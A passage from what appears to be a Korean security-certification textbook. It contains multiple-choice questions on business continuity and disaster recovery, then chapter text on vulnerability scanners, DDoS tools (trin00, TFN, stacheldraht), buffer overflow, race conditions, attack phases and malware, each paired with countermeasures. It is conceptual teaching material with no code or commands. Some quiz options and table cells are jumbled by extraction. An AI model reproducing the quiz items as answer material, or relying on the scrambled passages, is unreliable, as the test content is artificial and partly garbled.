시스템의 상호 이용 이 가능하도록 변경관리시스템에 대한 서면 합의가 사전에 이루어져야 한다. 54. 원격지 백업/저장 설비 제공업체를 선정하는 기준으로 가장 중요하지 않은 것은? 1 매체 관리 및 환경적 요인 3 평판 및 사이트 보안 2 고용인 수 4 운송 능력 337
338 58. 다음은 처리능력의 백업대안에 대한 설명이 다. 가장 적합하지 않은 것은? 62. 다음 중 예방 대책이면서 복구 대책인 것은 어느 것인가? 1 핫 사이트는 컴퓨터 장비, 네트워크, 전기 공급, 주변 제어장치 등 정보처리에 필요한 주요 설비를 구축한 백업대안이다. 2 웜 사이트는 컴퓨터 장비와 네트워크 장비는 되어 있으나 소프트웨어는 갖추지 않은 백업 대안이다. 3 콜드 사이트는 빈 공간에 전기공급과 최소한 의 기본설비만 갖춘 백업대안이다. 4 이중 데이터 센터는 물리적으로 떨어진 장소에 똑 같은 컴퓨터 장비와 네트워크 환경 을 구축하여 가용성을 즉각적으로 제공할 수 있는 대안이다. 59. 시스템의 위험 등급을 부여 할 때 그 결정 기준에 포함되지 않는 것은? 1 방문자 로그 2 미러링 사이트 3 비상계획 4 핫 사이트 63. 다음 중 재해복구계획(DRP)과 업무연속성계 획(BCP)에 대한 설명으로서 잘못된 것은? 1 BCP는 사고나 재해 이후 핵심 비즈니스 기능의 재개를 목표로 한다. 2 DRP는 사고나 재해 이후 시스템의 정상 복구를 목표로 한다. 3 BCP는 천재지변으로 인한 업무 중단을 DRP 는 주로 기계적인 원인으로 업무 중단을 다룬 다. 4 DRP는 BCP보다 기술적인 면에 초점을 맞추어 수립한다. 1 업무 재개에 소요되는 기간의 민감성 2 업무 재개의 중요성 3 시스템 중단에 대처할 수 있는 능력 4 시스템 개발에 소요된 비용 60. 다음 중 재해 발생 후 가장 먼저 실천에 옮 겨지는 계획은? 1 1 긴급대응계획(Emergency Plan) 2 재해복구계획(Disaster Recover Plan) 3 비상계획(Contingency Plan) 4 재해영향평가계획(Disaster Impact Analysis Plan) 64. 상업적인 복구서비스를 사용해야 할 경우, 고 려해야 할 요인들에 대한 설명 중 가장 중요하지 않은 것은? 1 명시된 요구사항을 만족시킬 수 있는 서비스 제공자의 능력 2 초기 설치비용, 연 사용료, 실제 사용요금, 훈련과 유지비용을 포함한 총 비용 3 서비스 제공자 장소에서 서비스가 제공될 경우, 서비스 제공자의 위치, 통신 서비스, 교통 등 4 복구 서비스 제공자의 해당 조직의 업무에 대한 이해도 61. 백업 전략 중 "cold site"에 포함된 장비 중 틀린 것은? 1 CPU, 기타 컴퓨터 장비 2 습기 제거 및 공기정화 장비 3 전력 관련 설비 4 통신 설비 65. 업무지속성을 위한 백업처리능력 대안으로서 Hot site, Mirror site, Warm site가 있는 데 이중 가장 빠르게 백업을 제공하는 순서를 기술한 것 은? 1 Hot site, Warm site, Mirror site 2 Hot site, Mirror site, Warm site 3 Mirror site, Warm site, Hot site 4 Warm site, Hot site, Mirror site 5 Mirror site, Hot site, Warm site 338
339 66. 사업 연속성 관리 절차에서 다루어야 할 사 항은? 1 규정 요구사항 2 상세 프로젝트 계획 기술 3 모든 결함에 대한 대처방안으로서 프로세스 개선 4 상위 경영진의 책임 개괄 67. 자산의 가치는 무엇을 수행함으로써 결정될 수 있는가? 1 재난 복구(DR) 2 상세 위험 분석 3 사업 영향 분석(BIA) 4 자산 결정 모델링(ADM) 68. 재난복구에서 실전 테스트가 중요한 이유는 무엇인가? 1 재난 복구계획(DRP)이 실제로 작동되는 지를 확인 2 정부의 법규정 준수 3 직원들이 재난 복구가 중요하다는 것을 알게 하기 위해서 4 경영진이 재난 복구 계획에 대해 알도록 하기 위해서 71. 용량산정 계획(capacity planning)을 위한 데 이터 소스로 적합한 것은? I. 실제 네트워크 데이터 II. 방화벽 규칙 III. 전자상거래 데이터베이스 IV. 비즈니스 예측 1 I 및 II 2 II 및 III 3 III 및 IV 4 I 및 IV 72. 다음 중 어떤 경우가 감사 데이터를 수집하 지 않을 타당한 이유가 될 수 있는가? 1 비즈니스 프로세스에 장애를 초래하는 경우 2 모든 데이터를 리뷰 할 수 없는 경우 3 방화벽 규칙에 장애를 초래하는 경우 4 데이터 분석 능력이 부족한 경우 73. 다음의 사업연속성 계획(BCP)의 핵심요소 중 에서 위험 발생 시 영향을 최소화하기 위한 행위 는? 1 복구(Recover) 2 완화(Mitigate) 3 감정(Evaluate) 4 평가(Assess) 5 대응(Respond) 69. 자산 가치를 평가할 때, 항상 정량적인 가치 만으로 평가되는 것은 아니다. 그 경우, 자산 가 치는 어떠한 방법으로 평가될 수 있는가? 1 주관적으로 3 높게 2 공개적으로 4 개인적으로 70. 보안 정책이 조직의 미션을 수행하는 것을 방해한다면, 다음 중 어떤 요구사항을 충족시키 지 못하는 것인가? 1 시간적 측면 3 평가 측면 2 실무적 측면 4 달성 측면 339
340 제 8장. 침해 사고 대응 제 1절. 취약점 이해 및 점검 chapter 1. 취약성 개념 chapter 2. 취약성 분석 chapter 3. 취약성 점검 제 2절. 공격 유형 이해 및 분석 chapter 1. 공격 기법 분류 chapter 2. 해킹 공격 절차 chapter 3. 해킹 공격 기술 제 3절. 악성 프로그램 이해 및 대응 chapter 1. 악성 프로그램 개념 chapter 2. 악성 프로그램 유형 제 4절. 침해 사고 및 대응 chapter 1. 침해 사고 분석 chapter 2. 침해 사고 대응 제 5절. 침해 사고 대응 문제 풀이 chapter 1. 종합 문제 340
341 제 1절. 취약점 이해 및 점검 chapter 1. 취약성 개념취약성(Vulnerability)이란 정보시스템에 손해를 끼치는 원인이 될 수 있는 조직, 절차, 인력관리, 행정, 하드웨어와 소프트웨어의 약점을 뜻한다. 이와 같은 약점을 확인하고 분류하여 위협을 감소시키는 것이 취약성을 분석하는 목적 이라 할 수 있다. chapter 2. 취약성 분석 공격은 일반적으로 정보 수집, 침입 공격, 공격 전이의 3단계를 통하여 이루어진다. 즉, 공격 대상에 대 한 정보 수집을 통하여 공격 목표와 공격 방법 등을 결정하고, 그 다음 수집한 정보를 바탕으로 실제 침입을 위한 공격이 진행된다. 그 후 공격이 마무리되면 최종 공격 목적을 이루기 위한 공격과 재침입 을 위한 백도어의 설치, 우회공격 경유지로 활용, 분산 공격을 위한 Agent화 등의 공격 전이와 실제적 인 파괴 행위를 하게 된다. 취약성 분석 시스템은 전형적인 해킹 공격의 정보 수집 단계와 침입 공격 단계에서 공격자들이 대상시 스템에 대한 정보와 취약성을 사전에 찾아낼 수 있는 불필요한 정보를 은닉하고 취약성을 제거하여 컴 퓨터 시스템을 안전하게 유지하기 위한 도구이다. 즉, 취약성분석 시스템의 근본 목적은 각 단계의 공 격 행위를 방어하는 데 있다. 취약성분석 시스템의 기능을 이해하기 위하여 정보 수집 단계와 침입 공격 단계에서 적용되는 공격 내 용에 대한 사전 이해가 필요하다. 다음 [표 8-1]은 각 공격 단계별 공격 기술에 대한 설명이다. 341
342 다음 [표 8-2]는 정보 수집 단계에서의 어떠한 정보를 수집하는지에 대한 설명이다. chapter 3. 취약성 점검 도구 점검 도구는 점검 위치에 따라 호스트 기반과 네트워크 기반 취약성 점검 도구로 구분되며 다음 [표 8-3]은 점검 위치에 따라 취약성 점검 도구를 구분한 것이다. 342
343 가. 호스트 기반 취약성 점검 도구 다음 [표 8-4]는 호스트 기반 취약성 점검 도구들에 대한 간략한 설명이다. [표 8-4] 호스트 기반 취약성 점검 도구 점검 도구 설명 COPS (Computerized Oracle and Password System)는 유닉스 시스템의 보안검 사 프로그램으로, 전반적인 시스템의 보안 취약성을 자동적으로 점검해주는 도 구이다. COPS는 여러 가지 모듈로 이루어져 있으며, 이 모듈들은 각각 특정 취 COPS 약성에 대해 점검하며 만 일 새로운 취약성이 발견되면 사용자가 발견된 취약 성을 점검하는 모듈을 작성 하여 첨가할 수 있다. COPS는 root가 아닌 일반 user들도 사용할 수 있다. 그러나 COPS는 보안 취약성을 진단만 할 뿐 조 치 및 대응하지는 않는다. 유닉스 시스템에서의 /usr/bin/passwd는 DES(Data Encryption Standard)를 따르 므로, 역함수를 구하기는 굉장히 까다로울 뿐만 아니라, 엄청난 시간이 걸리는 Crack 일이다. 하지만 사용자별로 암호를 추측하여 이를 /usr/bin/passwd에 의하여 암 호화시킨 뒤 이 를 /etc/passwd 파일 내의 암호화된 정보와 비교하여 암호를 추 적하는 것이 바로 크랙이다 기본적으로 시스템에 설치되어 있는 /usr/bin/passwd를 대체하는 도구로, 추측 Npasswd 이 가능한 암호나 null 암호를 사용불가능하게 만들어, 사용자 암호를 보다 강력 하게 만들수 있는 도구이다. Tripwire는 시스템 내부의 중요파일의 변조 유무를 검사하기 위해 각 파일들에 대한 체크썸을 데이터베이스화하여, 차후에 이들의 체크썸을 비교하여 변화가 Tripwire 있는지의 여부를 판단함으로써 해커에 의해 시스템에 변화가 생겼는지의 여부 를 확인할 수 있는 무결성 점검도구 이다. COPS 와 매우 비슷한 성격을 띠고 있으며, 파일 시스템 내부의 취약성 점검과 Tiger suid 설정 점검 등의 기본적인 체크리스트에 따라 호스트를 스캔하는 기능을 가 지고 있다. 유닉스 시스템에서 사용자와 시스템과의 통신은 바로 tty를 통해 커널과 통신함 으로써 이루어진다. ttywatcher의 경우 커널 드라이버를 생성하여, 시스템 내에 ttywatcher 로그온한 모든 tty 와 커널과의 통신을 도청할 수 있는 기능을 제공하여 준다. 물론 해커들 이 악용할만한 소지가 있는 보안도구이긴 하지만, 평소 의심하던 사용자를 감시하기 에는 굉장히 좋은 도구이다. 유닉스 시스템 자체가 멀티유저, 멀티프로세싱이므로 동시에 발생하는 작업들에 대한 자취를 남기는 루틴도 꽤 섬세하게 운영되고 있다. 하지만 시스템 내에 크 Swatch (Simple 나큰 일이 발생하는 그 순간에 관리자가 반드시 자리에 있다고 볼 수는 없는 Watcher) 일이다. swatch는 이런 상황에 대비해 정해준 규칙에 따라 스크립트가 실행되거 나, 벨이 울리는 등의 작업을 할 수 있다. 해쉬 알고리즘에 따라 체크썸 정보를 제공해 줌으로써 중요한 파일의 변조 유 MD5 무를 확 인할 수 있다. 하지만 비교 대상부터가 변조된 이후라면 이는 무용지물 이 된다. S/Key 는 원격 호스트로의 접속에 있어서 일회용 비밀번호(OTP)를 생성해주는 역 할을 한다. 때문에 스니핑과 같은 네트워크 레벨에서의 공격 방법에도 어느 S/key 정도 대 응할 수 있으므로 로컬 네트워크상에 의심스러운 자가 많은 경우 이를 사용해야 할 필요성이 있다. 343
344 나. 네트워크 기반 취약성 점검 도구 다음 [표 8-5]는 네트워크 기반 취약성 점검 도구들에 대한 간략한 설명이다. [표 8-5] 네트워크 기반 취약성 점검 도구 점검도구 SATAN COURTNEY GABRIEL Nmap ISS (Internet Security Scanner) Netlog Drawbridge NFSwatch TCPdump CPM 설명 SATAN (Security Administrator Tool for Analyzing Networks)은 COPS를 제작 한 Sun Microsystems의 Dan farmer에 의해, 네트워크 취약성 체크를 중점적 으로 하기 위해 개발되었으며 개발 당시까지 알려진 거의 모든 네트워크 취약 성들을 다루고 있다. 때문에 해커들에 의한 원격 공격의 한 방법으로 애용되기 도 하였다. 이와 반대되는 성격의 courtney와 gabriel이란 satan방어용 보안 도 구도 존재할 정도이다. 네트워크를 감시하여 사탄 공격시도를 탐지하는 도구로 Tcpdump의 결과를 입력으로 받아 주어진 시간 내에 특정 호스트로부터의 새로운 서비스 요청 수 를 감시한 다. SATAN 의 공격을 감지하는 도구이다. Port 점 검 기능과 OS 종류 점검 기능 등을 제공한다. 공개용으로 개발된 ISS 1.3 버전은 포트 스캔을 통해 취약성을 체크하는 루틴 과, NIS 맵 취약성, NFS 관련 취약성, 그리고 TCP 관련 데몬들의 취약성을 체 크하는 기능을 가지고 있다. 이는 또한 상용으로도 널리 개발되고 있다. IP spoofing이 널리 알려짐에 따라, TCP 와 UDP 등의 패킷 전송 상황을 모니 터할 수 있는 netlog가 등장하게 되었다. tcplogger와 udplogger를 통하여 자 신의 호스트로의 접속뿐만 아니라, 서브넷 상에서 이동하는 모든 패킷들을 볼 수 있다. 하지만 패킷만 보여줄 뿐, 이를 분석하는 루틴들은 제공되지 않으므 로, 관리자의 세심한 배려와 상당한 지식이 요구되는 모니터링 도구이다. tiger를 제작한 TAMU에서 제작된 것으로, 두 개의 이더넷 카드를 장착한 PC 를 통하여 패킷필터링을 가능케 하는 도구이다. 그러나 이를 위한 규칙을 설정 하는 것이 상당히 까다로운 도구이다. 특정 서버와 클라이언트 사이에 오고가는 NFS 관련 패킷들을 모니터링할 수 있는 도구이다. 네트워크상의 TCP 패킷들을 모니터링하는 도구로, TCPdump의 패킷 필터는 현재 로컬 네트워크상의 특정 패킷들을 실시간으로 기록해 둘 수 있으며 이를 이용하여 네트워크에서 벌어지는 일들을 네트워크 관리자가 원하는 대로 뽑아 볼 수 있도록 해준다. 또한 시스템 관리자들에게는 로컬유저의 외부로의 연결 을 감시하고, 또 특정 침입자가 침투 경로로 자주 이용하는 호스트 혹은 원하 지 않는 호스트로부터의 연결을 실시간으로 감시할 수 있게 해준다. packet sniffing과 같이 ethernet 상에 뿌려지는 패킷을 해커는 자신의 시스템 의 인터페이스를 열어 이들을 감지할 수 있게 된다. 이때 네트워크 인터페이스 는 'promiscuous mode'로 전향되며, 때문에 관리자는 CERT에서 개발된 CPM(Check Promiscuous Mode)을 통해 promiscuous mode인지 아닌지를 확 인할 수 있다. 344
345 제 2절. 공격 유형 이해 및 분석 chapter 1. 공격 기법 분류 가. 공격 의도에 따른 공격 기법 분류 공격 의도에 따라 크게 자원에 대한 불법적인 권한 획득을 위한 공격기법과 서비스 거부 공격 기법으 로 분류할 수 있다. (1) 불법적인 권한 획득을 위한 공격 기법 o 스푸핑 공격: IP 스푸핑, WEB 스푸핑, DNS 스푸핑 등 o 패스워드 크랙 공격 o 시스템, 프로그램, 서비스의 버그를 이용한 공격 등 (2) 서비스 거부 공격(DoS, Denial of Service) o 서비스 거부 공격 정의 목표 시스템에 짧은 시간에 큰 부하를 줌으로써 목표 시스템의 정상적인 동작을 방해하여 사용자들에 대한 '정상적인 서비스 제공'을 불가능하게 만드는 공격 방법을 말한다. 이 공격은 시스템의 서비스를 중단시키거나 서비스의 방해를 목적으로 하는 것으로 해킹을 통한 시스템 권한 획득, 정보의 파괴 및 변조 등을 목적으로 하는 공격과는 다르다. o 서비스 거부 공격 분류 서비스 거부 공격은 공격 유형에 따라 한 개의 시스템에서 목표 시스템에 많은 양의 패킷을 집중적으 로 보내서 시스템을 마비시키는 서비스 거부 공격과 분산된 수백, 수천의 시스템에서 목표 시스템을 공격하는 분산 서비스 거부 공격(DDoS) 방법이 있다. 다음 [표 8-6]은 공격 유형에 따라 서비스 거부 공격을 분류한 것이다. 345
346 o 분산 서비스 거부 공격(DDoS) 도구와 대응책 최근에 발견되고 있는 이러한 분산 환경에서의 서비스 거부 공격 도구는 trin00(혹은 trinoo), tribe flood network(tfn), stacheldraht 등이 있으며 다음 [표 8-7]은 각 DDoS 공격들에 대한 설명이다. [표 8-7] DDoS 공격 도구 공격 도구 trin00 TFN stacheldraht 설명 Trin00는 많은 소스로부터 통합된 UDP flood 서비스 거부 공격을 유발하는데 사 용되는 도구이다. trin00 공격은 몇 개의 서버들(혹은 마스터들)과 많은 수의 클라 이언트들(데몬들)로 이루어진다. 공격자는 trin00 마스터에 접속하여 마스터에게 하 나 혹은 여러 개의 IP 주소를 대상으로 서비스 거부 공격을 수행하라고 명령을 내 린다. 그러면 trin00 마스터는 목표시스템을 공격하도록 클라이언트(데몬)들과 통신 을 한다. TFN은 trin00와 거의 유사한 분산 서비스 거부 공격 도구로 많은 소스에서 하나 혹은 여러 개의 목표 시스템에 대해 서비스 거부 공격을 수행한다. TFN은 UDP flood 공격을 할 수 있을 뿐만 아니라 TCP SYN flood 공격, ICMP echo 요청 공 격, ICMP 브로드캐스트 공격(smurf 공격)을 할 수도 있다. TFN 서비스 거부 공격 은 공격자가 마스터 프로그램을 통해 공격 명령을 일련의 TFN 서버들(혹은 데몬 들)에게 보냄으로써 이루어진다. 그러면 데몬은 특정 형태의 서비스거부 공격을 하 나 혹은 여러 개의 목표 IP 주소를 대상으로 수행한다. 소스 IP 주소와 소스 포트 는 임의로 주어지고, 패킷의 사이즈도 바꿀 수 있다. stacheldraht는 trin00와 TFN이 갖고 있는 특성을 거의 유지하면서 공격자 시스템 (stacheldrah 마스터 시스템)과 agent daemon과의 사이의 통신에 암호화 기능이 추가된 것이다. DDoS의 공격에 대한 대응책으로 [표 8-8]과 같이 라우터, 침입차단시스템, 웹서버에서의 대응책이 있 을 수 있다. 346
347 [표 8-8] DDoS 공격 대응책 공격 대응책 내용 o ACL을 이용한 사설 네트워크 주소(RFC 1918) 필터링 : Private Network Filtering 라우터에서의 대응책 o ACL을 이용한 DDoS 필터링 사용 : 추가 모듈로 제공되는 DDoS Filter 모듈 사용 o IP verify unicast reverse path interface 설정 o ICMP 패킷에 대한 rate limit 설정 o SYN 패킷에 대한 rate limit 설정 침입차단 시스템에서의 대응책 웹서버에서의 대응책 o Random detect 설정 등의 방법이 있다. o 침입차단시스템에 대한 SYNC flooding 공격 시 침입차단시스템을 목적지로 하는 패킷에 대해 자체의 패킷 필터링 정책에 의해 차단한 다. o 침입차단시스템의 정책 설정을 통해 침입차단시스템을 통과하는 SYN, ICMP 패킷을 필터링한다. 하지만 악성 패킷을 완벽히 구별하는 것은 불가능하다. NAT에서 사용하는 내부 IP 주소 등 비정상적 인 패 킷에 대한 필터링을 통해 보안을 강화한다. o DoS 공격에 의한 ICMP 패 킷, SYN 패킷 등은 라우터 및 침입차단 시스템에서 상당 부분 차단될 수 있으나, 라우 터 및 침입차단시스템 을 통과한 패킷에 의해 시스템이 crash되는 것을 막기 위해 웹 서버 에서 최대 동시 연결 세션의 한계치를 설정한다. 대량의 패킷이 유입 될 경우 서 비스 지연이 발생할 수 있으나, 서비스 지연을 원천적으 로 막지는 못한다. 다만, 라 우터와 침입차단시스템을 통한 신속한 대 응으로 서비스 지연 등을 최소화하는 것은 가능하다. 347
348 나. 공격 유형에 따른 공격 기법의 분류 다음 [표 8-9]는 대표적인 공격 유형에 따라 공격 방법을 분류한 것이다. 348
349 다. 공격 위치에 따른 공격 기법의 분류 공격 위치에 따라서 크게 시스템 기반 공격과 네트워크 기반 공격으로 분류될 수 있다. (1) 시스템 기반 공격 유형 및 대처 요령 시스템 기반 공격으로는 시스템의 취약성을 공격하는 것을 말하며, 버퍼 오버플로와 경쟁 상태 등이 있다. (가) 버퍼 오버플로버퍼 오버플로(Buffer Overflow)는 프로그래밍 당시 정해준 버퍼 크기 이상의 데이터를 버퍼에 저장하여 버 퍼가 넘치게 하는 것을 말한다. 이렇게 넘친 데이터는 프로그램의 다음 수행에 신뢰성을 제공하지 못 하게 된다. 이러한 버퍼 오버플로 취약성을 이용한 공격을 이용하여 공격자는 자신이 원하는 명령을 수행하도록 하는 것이다. 이 버그의 해결책으로 가장 좋은 방법은 시스템을 제공한 업체로부터 패치를 받아서 설치하거나 새로 운 버전으로 설치하는 것이다. 또한 프로그램을 작성할 경우 이러한 경계를 점검하는 함수를 사용하여 프로그램을 만드는 것이 좋다. 이런 함수로는 fgets(), strncpy(), strncat() 등이 있으며, 경계를 점검하지 않는 함수은 strcat(), strcpy(), gets(), sprintf(), sscanf() 등이 있다. (나) 경쟁 상태 멀티프로그래밍을 구현한 컴퓨터는 유한한 자원을 여러 프로세스가 같이 사용한다. 이 때 여러 프로세 스는 서로 자원을 가지기 위해서 경쟁을 하는데 이러한 상태를 경쟁 상태(Race Condition)라고 한다. 처음 경쟁 상태는 해킹을 의미하는 것이 아니었으나 영국의 해킹단체 8lgm이 경쟁 상태를 이용하여 root 권한을 얻어내는 방법을 발견한 후부터 경쟁 상태 라는 말이 하나의 해킹 기법을 의미하게 되었 다. 경쟁 상태에서 시스템은 동일한 두 프로세스에게 규칙성 있게 자원을 할당하지 못하는 버그를 갖고 있 어, root 소유의 setuid가 설정된 시스템 프로그램과 크래커의 exploit 프로그램이 서로 경쟁 상태에 이 르게 하면 크래커의 exploit 프로그램이 시스템 프로그램의 권한으로 중요 파일에 접근이 가능하다. 이러한 경쟁 상태를 막으려면 먼저 root 권한의 setuid 파일을 실행할 때 임시 파일을 만들지 않는 것 이 좋으며 unlink()를 불가능하게 하고 링크 점검 시에 lstat()를 이용하여 심볼릭 링크에 대한 경쟁을 피하는 것이 좋다. open()을 사용한 후에는 fstat()로 확인을 하는 것이 좋다. 349
350 (2) 네트워크 기반 공격 유형 및 대처 요령 네트워크를 기반으로 하는 공격에는 서비스 거부(Denial of Service), 스캐닝(Scanning), IP 스푸핑(IP Spoofing), 스니핑(Sniffing) 등의 다양한 Remote 공격 기법이 있다. (가) 서비스 거부/분산 서비스 거부 공격서비스 거부 공격은 분산시스템 자원에 대한 정상적인 서비스를 방해하는 공격이다. 즉 시스템 자 원에 대한 공격이나 네트워크에 과부하를 발생시켜서 서비스의 정상적인 동작을 방해하거나 불가능하 게 하는 것을 말한다. 서비스 거부 공격 유형은 크게 다음 3가지로 구분된다. o 시스템 자원 파괴 공격 - 디스크 포맷, 시스템 파일 삭제 o 시스템 과부하 공격 - 프로세스 자원 고갈, 메모리 고갈, 디스크 채우기 등 o 네트워크 과부하 공격 - smurf, land, ping flooding, UDP flooding 등 분산 서비스 거부 공격(DDoS, Distributed DoS)은 서비스 거부 공격과 같은 성격을 가진 것이나 더 욱 지능화된 서비스 거부 공격으로 여러 대의 컴퓨터에서 동시에 하나의 공격 대상을 정하여 일시에 공격하는 서비스 거부 공격이다. 현재 이러한 서비스 거부 공격에 대한 근본적인 해결책은 없으나 라우터 등의 네트워크 장비에서 발신 지 어드레스 필터링으로 감소시키는 방법을 사용할 수 있다. (나) 스캐닝 스캐닝(Scanning)은 시스템의 상태나 시스템에서 사용하는 서비스 등을 찾아, 각 해당되는 취약성을 찾 기 위해 사용되는 공격으로 실제 공격하기 위한 사전 준비 단계라고 할 수 있다. 이러한 스캐닝 도구 에는 mscan, sscan 등이 있다. 스캐닝에 대한 대처 방법으로 사용하지 않는 서비스는 모두 차단하고, 사용 중인 서비스에 대해서는 해당 벤더 업체에서 제공하는 최신 보안 패치를 설치하여 알려진 보안 취약성을 제거하도록 한다. (다) IP 스푸핑 스푸핑(Spoofing)은 속이다 라는 의미이며 IP 스푸핑은 IP를 속여서 공격하는 기법을 의미한다. 즉, IP 스푸핑 공격을 이용하여 공격 목표 시스템에게 마치 그 목표시스템이 신뢰하는 호스트인양 위장할 수 있다. IP 스푸핑은 외부에서 들어오는 패킷 중에서 출발지 IP 주소가 내부망 IP 주소를 가지고 있는 패킷을 라우터 등의 네트워크 장비에서 패킷 필터링을 사용하여 막음으로써 가능하다. 그러나 이 경우 내부 사용자에 의한 IP 스푸핑 공격은 막을 수 없으므로 각 시스템에서 TCP Wrapper, SSH 등을 설치해서 운영하고, rsh, rlogin 등과 같이 패스워드의 인증 과정이 없는 서비스를 사용하지 않는 것이 바람직하 다. 그러나 여러 종류의 IP 스푸핑은 TCP/IP의 설계와 구현상의 문제점에 기인한 것으로 새로운 프로 토콜을 사용하지 않는 한 완벽한 보호대책은 존재할 수 없다. 다만 지속적인 보안관리 및 점검만이 최 소한의 피해를 막을 수 있다. 350
351 (라) 스니핑 TCP/IP 프로토콜은 전송 데이터가 암호화되지 않은 채 전송되도록 설계되어 있다. 따라서 네트워크상 에서 이동하는 패킷들을 모아서 순서에 맞게 재조합을 한다면 원래의 데이터를 얻을 수 있으며 이러한 TCP/IP 프로토콜의 취약성을 이용하여 네트워크상에 흐르는 패킷을 모아 원격 호스트에 접속하는 클라 이언트의 아이디, 패스워드 등 중요 정보를 알아내는 것을 스니핑(Sniffing) 공격이라 한다. 스니핑 공격을 막기 위해서는 네트워크로 보내는 데이터를 정당한 사용자가 아닌 경우에는 볼 수 없도 록 암호화를 하거나 원격 호스트 접속 프로그램의 경우 SSL, SSH나 Slogin과 같은 보안 프로그램을 사 용하여 접속하는 것이 바람직하다. (마) 기타 공격 시스템에서 사용되는 서비스의 취약성을 사용하여 원격에서 공격을 시도하는데 주로 공격을 당하는 데 몬들은 mountd, imapd, named 등이 있으며 이러한 데몬들은 반드시 사용해야할 경우에만 서비스를 열어두도록 하며 항상 최신의 보안 패치 파일을 받아 설치하거나 새로운 버전으로 설치하는 것이 바람 직하다. 351
352 chapter 2. 해킹 공격 절차 가. 1단계(정보 수집) 공격자가 공격을 준비하기 위한 첫 번째 단계로, 공격 대상에 대한 정보를 파악하는 단계이다. 주로 네 트워크 구성, 네트워크 장비의 종류 및 버전, 시스템 OS 및 오픈된 서비스의 종류와 버전 등에 대한 정보를 수집한다. 또한 공격 대상 시스템에 대해 직접적으로 연결할 수 없는 경우 공격 대상이 속한 네트워크에 대한 전반적인 정보를 수집하여, 우회 공격을 위한 정보 수집을 병행한다. 결국 정보수집 단계는 공격대상 네트워크에 어떤 호스트가 있으며, 이 호스트들이 어떤 서비스를 제공 하고 있는가, 그리고 네트워크가 어떻게 구성되어 있는가를 파악하여 최종 공격을 하기 위한 경로, 방 법, 대상을 찾아내는 단계이다. 나. 2단계(침입 공격) 시스템 침입단계는 실제 개별 시스템에 침입하는 단계로 정보 수집단계에서 수집한 정보를 바탕으로 가장 취약한 부분, 즉 버그나 취약성이 존재하는 서버를 먼저 공격한다. 사전 공격 대상이 되는 취약성 은 원격 버퍼 오버플로의 취약성과 같이 주로 이미 알려진 취약성을 이용하는 방법과 서버와 소프트웨 어의 설정 오류를 이용하는 방법 그리고 패스워드 크랙 등의 방법들이 사용된다. 시스템 침입 단계에 사용되는 방법은 이미 잘 알려져 있고 많은 공격 도구들이 공개되어 있으며 체계 화되어 있다. 따라서 시스템/네트워크에 대해 깊은 지식이 없는 소위 스크립트 키드라 불리는 해킹 관 심자들도 누구나 손쉽게 시스템에 침입할 수 있다. 다. 3단계(공격전이) 공격전이 단계는 1차적인 시스템 침입 이후에 실제적인 공격 목표를 완성하기 위하여 공격 대상의 기 밀성, 무결성, 가용성을 파괴하거나, 1차적인 침입으로부터 얻은 정보와 추가 정보 수집을 통하여 시스 템 침입을 확대하고 다른 시스템으로 침입하는 단계이다. 352
353 chapter 3. 해킹 공격 기술 변화전통적인 공격 모델은 컴퓨터 자원에 불법적으로 접근하기 위해, 공격 목표 시스템에 접근할 수 있는 취약성을 찾는 취약성 점검 공격과 이렇게 찾아진 취약성을 이용하여 특정 시스템의 버그를 집중 적으로 공격하는 도구 그리고 백오리피스 등의 백도어 프로그램, 인터넷 웜과 같은 악성프로그램을 이 용하는 공격 등이 주류를 이루었다. 또한 전통적인 공격 모델에서의 침입 경로는 다단계의 경로를 거 친 후 최종 공격대상시스템을 공격하여 공격자의 흔적을 감춤으로써 역추적이 거의 불가능하였다. 전통적인 공격 모델의 변화의 가장 큰 원인은 방어자의 보안 수준 향상에 기인한다. 침입차단시스템, 침입탐지시스템 등의 보안 시스템의 보편화는 전통적인 공격 모델에 매우 효과적인 대응 수단을 제공 한다. 하지만 이런 보안 장벽을 우회하여 성공적으로 시스템에 침입하기 위한 기술 및 도구들이 지속 적으로 만들어지고 있으며 이들 공격 도구의 특징을 종합해보면 은닉화(Stealth), 분산화(Distribute), 에 이전트화(Agent), 자동화(Automate) 등의 특징을 가지고 있다. 제 3절. 악성 프로그램 이해 및 대응 chapter 1. 악성 프로그램 개념 악성 프로그램은 시스템 내에 설치되어 시스템의 정상적인 동작을 방해하거나 또는 사용자가 알아채지 못하는 상태에서 특정 작업을 수행하게 하는 프로그램을 말한다. 공격자는 악성 프로그램을 이용하여 대상 시스템의 기능을 마비시키거나, 손상시켜 사용자가 시스템을 사용하지 못하게 하거나, 설치된 프 로그램을 이용하여 불법 접근을 하거나 목표 시스템에서 정보를 가져올 수 있다. chapter 2. 악성 프로그램 유형 컴퓨터 바이러스, 백도어, 트로이 목마, 웜 등이 대표적인 악성 프로그램이다. 가. 컴퓨터 바이러스 (1) 컴퓨터 바이러스 개요 컴퓨터 바이러스(Computer Virus)는 생물학적 바이러스와 비슷한 방식으로 작동하는 일련의 프로그램 코드로서, 컴퓨터를 파괴하도록 특수하게 개발된 악성 프로그램으로 정의되며, 생물학적 바이러스와 마 찬가지로 높은 자기 증식력과 전염성을 가지고, 숙주(컴퓨터)의 작동이나 안전성에 심각한 영향을 미친 다. 컴퓨터 바이러스의 가장 큰 특징은 정상적 프로그램과 달리 사용자 몰래 자기 자신을 다른 곳에 복사 하는 명령어를 포함하고 있어 자기 복사 능력이 있다. 두 번째 특징으로는 사용자의 하드디스크에 저 장된 파일이나 중요한 시스템 정보를 지워 버린다든가 사용자를 놀라게 하는 메시지를 출력하는 등 다 양한 부작용을 일으킨다는 것이다. 353
354 (2) 컴퓨터 바이러스 분류 (가) 발전 단계에 따른 컴퓨터 바이러스 분류 발전 단계라는 것은 바이러스에 사용된 기법을 말하는 것으로 시기적인 순서는 아니다. 예들 들자면 최초의 IBM PC 바이러스로 인정받은 브레인 바이러스(Brain Virus)의 경우는 3세대 기법을 사용하고 있 다. o 1세대 원시형 바이러스(1987~1989) 아마추어 프로그래머들이 만든 단순하고 분석하기 쉬운 바이러스로 주로 기억 장소에 상주하며 부트섹 터나 파일을 감염시키는 특징을 가지고 있다. 초창기 바이러스로는 예루살렘 바이러스가 해당된다. o 2세대 암호화 바이러스(1990~1992) 백신 프로그램의 진단을 피하기 위해 바이러스 프로그램의 일부 혹은 대부분을 암호화시켜 저장시킨 바이러스를 말한다. 감염자의 입장에서 보면 1세대 바이러스와의 차이점을 느낄 수 없다(감염경로나 피해 상황이 달라진 것이 없기 때문임). 그렇지만 백신 제작자의 입장에서는 1세대 바이러스에 비해 암호해독루틴(decryption routine)을 백신에 포함 시켜야 하기 때문에 1세대 바이러스에 비해서 백신 제작 기간이 길어지게 